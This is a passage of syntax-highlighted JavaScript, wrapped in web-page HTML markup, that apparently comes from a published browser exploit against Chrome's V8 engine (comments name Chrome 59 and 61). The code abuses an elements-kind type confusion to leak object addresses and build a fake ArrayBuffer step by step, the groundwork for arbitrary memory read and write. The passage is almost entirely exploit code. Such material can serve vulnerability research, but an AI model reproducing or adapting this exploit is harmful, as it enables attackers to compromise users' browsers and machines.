id=\"crayon-5994c4d8266a7993443183-54\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-55\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-56\"><span class=\"crayon-v\">optimizer4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-57\"><span class=\"crayon-v\">optimizer4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-58\"><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">optimizer4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-59\"><span class=\"crayon-v\">map_manipulator4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2.2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5994c4d8266a7993443183-60\"><span class=\"crayon-v\">map_manipulator4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x123<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-61\"><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">map_manipulator4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-63\"><span class=\"crayon-v\">map_manipulator4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-64\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-65\"><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2.2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-66\"><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x4<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-67\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x100000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-68\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">optimizer4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">arraybuffer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">__proto__<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-69\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-70\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-71\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">e4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5994c4d8266a7993443183-72\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-73\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-74\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-75\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x100000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-76\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">e4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-77\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-78\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-79\"><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-v\">arraybuffer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">__proto__<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-80\"><span class=\"crayon-v\">ab_proto_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">u2d<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">e4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-81\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-82\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xdaba0000<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-83\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_map_obj<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-84\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-85\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x1f000008<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x000900c3<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/chrome 59<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-86\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/0x0d00000a,0x000900c4,&nbsp;&nbsp;\/\/chrome 61<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-87\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x082003ff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-88\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/ use ut32.prototype replace it<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-89\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-90\"><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-91\"><span class=\"crayon-v\">ab_constructor_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_proto_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x70<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5994c4d8266a7993443183-92\"><span class=\"crayon-v\">ab_map_obj<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x6<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_proto_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-93\"><span class=\"crayon-v\">ab_map_obj<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x7<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_proto_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-94\"><span class=\"crayon-v\">ab_map_obj<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_constructor_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-95\"><span class=\"crayon-v\">ab_map_obj<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x9<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">ab_constructor_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-96\"><span class=\"crayon-v\">float_arr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-97\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-98\"><span class=\"crayon-e\">gc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-99\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_map_obj_float<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-100\"><span class=\"crayon-e\">change_to_float<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ab_map_obj<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-v\">ab_map_obj_float<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-101\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-102\"><span class=\"crayon-c\">\/******************************* step 2&nbsp;&nbsp;&nbsp;&nbsp;read fake_ab_map_ address&nbsp;&nbsp; ***************************************\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-103\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-104\"><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">ab_map_obj_float<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-105\"><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">u2d<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">e4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x40<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-106\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-107\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fake_ab<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5994c4d8266a7993443183-108\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-109\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-110\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_map_obj_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-111\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* buffer length *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-112\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x12345678<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x123<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-c\">\/* buffer address *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-113\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-114\"><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-115\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fake_ab_float<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-116\"><span class=\"crayon-e\">change_to_float<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fake_ab<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">fake_ab_float<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-117\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-118\"><span class=\"crayon-c\">\/******************************* step 3&nbsp;&nbsp;&nbsp;&nbsp;read fake_ArrayBuffer_address&nbsp;&nbsp; ***************************************\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-119\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-120\"><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">fake_ab_float<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-121\"><span class=\"crayon-v\">fake_ab_float_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">u2d<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">e4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x40<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-122\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-123\"><span class=\"crayon-c\">\/******************************* step 4 fake a ArrayBuffer&nbsp;&nbsp; ***************************************\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-124\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-125\"><span 
class=\"crayon-v\">fake_ab_float_addr_f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">d2u<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fake_ab_float_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">fake_ab_float_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-126\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-127\"><span class=\"crayon-r\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'function e3(){&nbsp;&nbsp;evil3[1] = '<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">fake_ab_float_addr_f<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">';}'<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-128\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x6000<\/span><span 
class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-129\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">e3<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-130\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-131\"><span class=\"crayon-e\">change_elements_kind_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">evil3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-132\"><span class=\"crayon-e\">e3<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-133\"><span class=\"crayon-v\">fake_arraybuffer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">evil3<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-134\"><span class=\"crayon-st\">if<\/span><span 